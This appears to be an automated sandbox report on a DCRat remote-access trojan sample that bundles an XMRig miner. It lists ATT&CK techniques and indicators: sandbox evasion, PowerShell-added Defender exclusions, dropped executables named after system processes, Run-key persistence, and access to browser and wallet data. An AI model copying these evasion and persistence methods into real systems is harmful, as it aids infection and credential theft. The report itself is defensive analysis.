dcrat | 53d6112deaab099a9da782ba5fe8ccf729b2b1328bb0a62afdc9f09f9cd427c6

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	cd57e4c171d6e8f5ea8b8f824a6a7316.exe

XMRig Miner payload 11 IoCs

miner

resource	yara_rule
behavioral1/memory/5960-2970-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/5960-2971-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/5960-2977-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/5960-2976-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/5960-2978-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/5960-2975-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/5960-2974-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/5960-2989-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/5960-3023-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/5960-3025-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/5960-3024-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 31 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2240	powershell.exe
5072	powershell.exe
1476	powershell.exe
1388	powershell.exe
5924	powershell.exe
5172	powershell.exe
5792	powershell.exe
2588	powershell.exe
4864	powershell.exe
128	powershell.exe
4048	powershell.exe
5160	powershell.exe
4652	powershell.exe
5108	powershell.exe
4504	powershell.exe
776	powershell.exe
5960	powershell.exe
1260	powershell.exe
1880	powershell.exe
3344	powershell.exe
5140	powershell.exe
4860	powershell.exe
5964	powershell.exe
5956	powershell.exe
4712	powershell.exe
1528	powershell.exe
5912	powershell.exe
2016	powershell.exe
2232	powershell.exe
5016	powershell.exe
5920	powershell.exe

Downloads MZ/PE file

.NET Reactor proctector 1 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/memory/3440-43-0x0000000000400000-0x0000000000CC7000-memory.dmp	net_reactor

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	cd57e4c171d6e8f5ea8b8f824a6a7316.exe

Executes dropped EXE 64 IoCs

pid	Process
4352	Result.exe
2756	DCRatBuild.exe
976	Bloxstrap.exe
1592	Frage build.exe
4884	SolaraBootstrapper.exe
2680	solara.exe
2944	Refcrt.exe
988	Registry.exe
5180	ComContainerbrowserRefRuntime.exe
4196	Roblox.exe
5764	conhost.exe
568	Bloxstrap.exe
5744	msiexec.exe
2064	sihost64.exe
5808	vc_redist.x64.exe
3568	vc_redist.x64.exe
3372	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
3696	Registry.exe
4568	explorer.exe
5364	sppsvc.exe
4660	dllhost.exe
484	spoolsv.exe
2012	csrss.exe
4724	msiexec.exe
2652	sppsvc.exe.exe
2932	msiexec.exe
3004	Registry.exe.exe
5740	explorer.exe.exe
2692	msiexec.exe
1296	wscript.exe
3156	dllhost.exe.exe
2960	msiexec.exe
5172	spoolsv.exe.exe
3220	csrss.exe.exe
4252	msiexec.exe
5488	msiexec.exe
5964	msiexec.exe
5444	backgroundTaskHost.exe
1140	wscript.exe.exe
3728	msiexec.exe
1916	backgroundTaskHost.exe.exe
3908	msiexec.exe
5164	explorer.exe
720	sppsvc.exe
132	Registry.exe
5956	winlogon.exe
4008	System.exe
3156	Roblox.exe
1956	Registry.exe.exe
2012	msiexec.exe
1888	msiexec.exe
1100	explorer.exe.exe
3100	msiexec.exe
5032	winlogon.exe.exe
4972	sppsvc.exe.exe
5444	msiexec.exe
2652	System.exe.exe
5856	csrss.exe
4784	dllhost.exe
3364	spoolsv.exe
4576	msiexec.exe
1992	csrss.exe.exe
4948	dllhost.exe.exe
5312	msiexec.exe

Loads dropped DLL 17 IoCs

pid	Process
5196	MsiExec.exe
5196	MsiExec.exe
5364	MsiExec.exe
5364	MsiExec.exe
5364	MsiExec.exe
5364	MsiExec.exe
5364	MsiExec.exe
5556	MsiExec.exe
5556	MsiExec.exe
5556	MsiExec.exe
5196	MsiExec.exe
3568	vc_redist.x64.exe
3372	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
3372	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
3372	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
3372	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
3372	cd57e4c171d6e8f5ea8b8f824a6a7316.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/memory/3372-3618-0x0000000180000000-0x0000000180B57000-memory.dmp	themida
behavioral1/memory/3372-3763-0x0000000180000000-0x0000000180B57000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 24 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files\\Windows NT\\TableTextService\\en-US\\dllhost.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3766757357-1293853516-507035944-1000\Software\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\Program Files\\Microsoft Office\\PackageManifests\\spoolsv.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3766757357-1293853516-507035944-1000\Software\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\winNet\\winlogon.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Users\\Default\\SendTo\\sppsvc.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3766757357-1293853516-507035944-1000\Software\Microsoft\Windows\CurrentVersion\Run\backgroundTaskHost = "\"C:\\Windows\\IdentityCRL\\INT\\backgroundTaskHost.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3766757357-1293853516-507035944-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\winNet\\explorer.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\winNet\\explorer.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\backgroundTaskHost = "\"C:\\Windows\\IdentityCRL\\INT\\backgroundTaskHost.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\winNet\\csrss.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3766757357-1293853516-507035944-1000\Software\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\""	Roblox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3766757357-1293853516-507035944-1000\Software\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Users\\Default\\SendTo\\sppsvc.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3766757357-1293853516-507035944-1000\Software\Microsoft\Windows\CurrentVersion\Run\Registry = "\"C:\\Program Files\\Internet Explorer\\Registry.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Registry = "\"C:\\Program Files\\Internet Explorer\\Registry.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Program Files\\Java\\jdk-1.8\\include\\win32\\bridge\\System.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\Users\\Admin\\AppData\\Local\\msiexec.exe\""	Roblox.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\winNet\\winlogon.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3766757357-1293853516-507035944-1000\Software\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\wscript.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3766757357-1293853516-507035944-1000\Software\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Program Files\\Java\\jdk-1.8\\include\\win32\\bridge\\System.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\Program Files\\Microsoft Office\\PackageManifests\\spoolsv.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3766757357-1293853516-507035944-1000\Software\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\Users\\Admin\\AppData\\Local\\msiexec.exe\""	Roblox.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\""	Roblox.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\wscript.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3766757357-1293853516-507035944-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files\\Windows NT\\TableTextService\\en-US\\dllhost.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3766757357-1293853516-507035944-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\winNet\\csrss.exe\""	Refcrt.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
19	2244	msiexec.exe
21	2244	msiexec.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cd57e4c171d6e8f5ea8b8f824a6a7316.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs

Web Service

T1102

flow	ioc
45	raw.githubusercontent.com
60	raw.githubusercontent.com
63	raw.githubusercontent.com
100	raw.githubusercontent.com
170	raw.githubusercontent.com
42	raw.githubusercontent.com
137	raw.githubusercontent.com
146	raw.githubusercontent.com
154	raw.githubusercontent.com
163	raw.githubusercontent.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com
10	ipinfo.io
30	ipinfo.io

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	\??\c:\Windows\System32\f9wobl.exe	csc.exe
File created	\??\c:\Windows\System32\CSC6EDE1823CE8C44998F71C1B5779EF3EF.TMP	csc.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
3372	cd57e4c171d6e8f5ea8b8f824a6a7316.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3956 set thread context of 5960	3956	conhost.exe	269

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\abort-controller\dist\abort-controller.umd.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\cacache\node_modules\glob\glob.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\tuf-js\dist\fetcher.d.ts	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\minipass-flush\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\pacote\lib\registry.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\minipass\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\events\tests\symbols.js	msiexec.exe
File created	C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe	Refcrt.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\spdx-correct\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\installed-package-contents\README.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\rimraf\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\cacache\lib\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-org.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\promise-inflight\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\retry\example\dns.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\man\man1\npm-audit.1	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-audit.html	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\readable-stream\lib\internal\streams\duplexify.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-org.html	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\safe-buffer\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmexec\lib\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\docs\README.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@tootallnate\once\dist\overloaded-parameters.d.ts	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\lib\clean.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\arborist\lib\arborist\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\gyp\.github\workflows\node-gyp.yml	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\make-fetch-happen\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\encoding\lib\encoding.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\arborist\lib\debug.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\lib\commands\version.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\fs\lib\common\node.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\tuf-js\dist\store.d.ts	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\normalize-package-data\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\lru-cache\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\lib\commands\link.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\diff\lib\index.mjs	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\brace-expansion\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmhook\lib\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\pacote\lib\dir.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\tiny-relative-date\translations\en.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\sigstore\dist\util\encoding.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\fastest-levenshtein\LICENSE.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\lib\commands\audit.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\readable-stream\errors-browser.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\tiny-relative-date\src\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm.html	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\cmd-shim\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\styles.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\npm.ps1	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmpublish\README.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\lib\commands\ci.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\p-map\license	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\lib\workspaces\update-workspaces.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-repo.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\bin\node-gyp.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\installed-package-contents\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\sigstore\dist\tlog\verify\body.d.ts	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\socks\build\common\helpers.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@tootallnate\once\dist\types.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\make-fetch-happen\lib\cache\policy.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\unique-filename\lib\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\postcss-selector-parser\LICENSE-MIT	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\semver\functions\inc.js	msiexec.exe

Drops file in Windows directory 34 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\SystemTemp\~DF47CE9A4BBDC55819.TMP	msiexec.exe
File created	C:\Windows\Installer\e57c11d.msi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC}	msiexec.exe
File created	C:\Windows\Web\Wallpaper\Windows\wscript.exe	ComContainerbrowserRefRuntime.exe
File opened for modification	C:\Windows\Installer\MSID843.tmp	msiexec.exe
File created	C:\Windows\Installer\{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC}\NodeIcon	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI54CB.tmp	msiexec.exe
File created	C:\Windows\SystemTemp\~DF55B22294D6ABB9D2.TMP	msiexec.exe
File created	C:\Windows\SystemTemp\~DFD86BC634B1D20DAD.TMP	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICBBC.tmp	msiexec.exe
File created	C:\Windows\SystemTemp\~DF35FAEF32B22AFAED.TMP	msiexec.exe
File created	C:\Windows\LiveKernelReports\conhost.exe	ComContainerbrowserRefRuntime.exe
File opened for modification	C:\Windows\LiveKernelReports\conhost.exe	ComContainerbrowserRefRuntime.exe
File opened for modification	C:\Windows\Installer\MSI543E.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICC3A.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICC7A.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIEBCE.tmp	msiexec.exe
File created	C:\Windows\Installer\e57c121.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID863.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIEB9E.tmp	msiexec.exe
File created	C:\Windows\LiveKernelReports\088424020bedd6	ComContainerbrowserRefRuntime.exe
File created	\??\c:\Windows\IdentityCRL\INT\CSCFB022689F64F454281863A9528E616A9.TMP	csc.exe
File created	\??\c:\Windows\IdentityCRL\INT\backgroundTaskHost.exe	csc.exe
File opened for modification	C:\Windows\Installer\MSI575D.tmp	msiexec.exe
File created	C:\Windows\IdentityCRL\INT\backgroundTaskHost.exe	Refcrt.exe
File created	C:\Windows\IdentityCRL\INT\eddb19405b7ce1	Refcrt.exe
File opened for modification	C:\Windows\Installer\e57c11d.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID302.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5662.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Web\Wallpaper\Windows\817c8c8ec737a7	ComContainerbrowserRefRuntime.exe
File opened for modification	C:\Windows\Installer\{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC}\NodeIcon	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedgewebview2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedgewebview2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedgewebview2.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27	msiexec.exe

Modifies registry class 35 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\NodeRuntime	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Version = "303038464"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-3766757357-1293853516-507035944-1000_Classes\Local Settings	Frage build.exe
Key created	\REGISTRY\USER\S-1-5-21-3766757357-1293853516-507035944-1000_Classes\Local Settings	Roblox.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\npm	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\InstanceType = "0"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-3766757357-1293853516-507035944-1000_Classes\Local Settings	ComContainerbrowserRefRuntime.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\PackageCode = "347C7A52EDBDC9A498427C0BC7ABB536"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-3766757357-1293853516-507035944-1000_Classes\Local Settings	DCRatBuild.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\PackageName = "node-v18.16.0-x64.msi"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\corepack	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Assignment = "1"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\DeploymentFlags = "3"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782\5B532AFE1A6C6E24B99C208A5DF6C1CD	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Media	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\EnvironmentPathNpmModules = "EnvironmentPath"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\NodeEtwSupport = "NodeRuntime"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\EnvironmentPathNode = "EnvironmentPath"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\ProductIcon = "C:\\Windows\\Installer\\{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC}\\NodeIcon"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Net	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Media\1 = ";"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\EnvironmentPath	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\ProductName = "Node.js"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\AdvertiseFlags = "388"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\AuthorizedLUAApp = "0"	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Clients = 3a0000000000	msiexec.exe
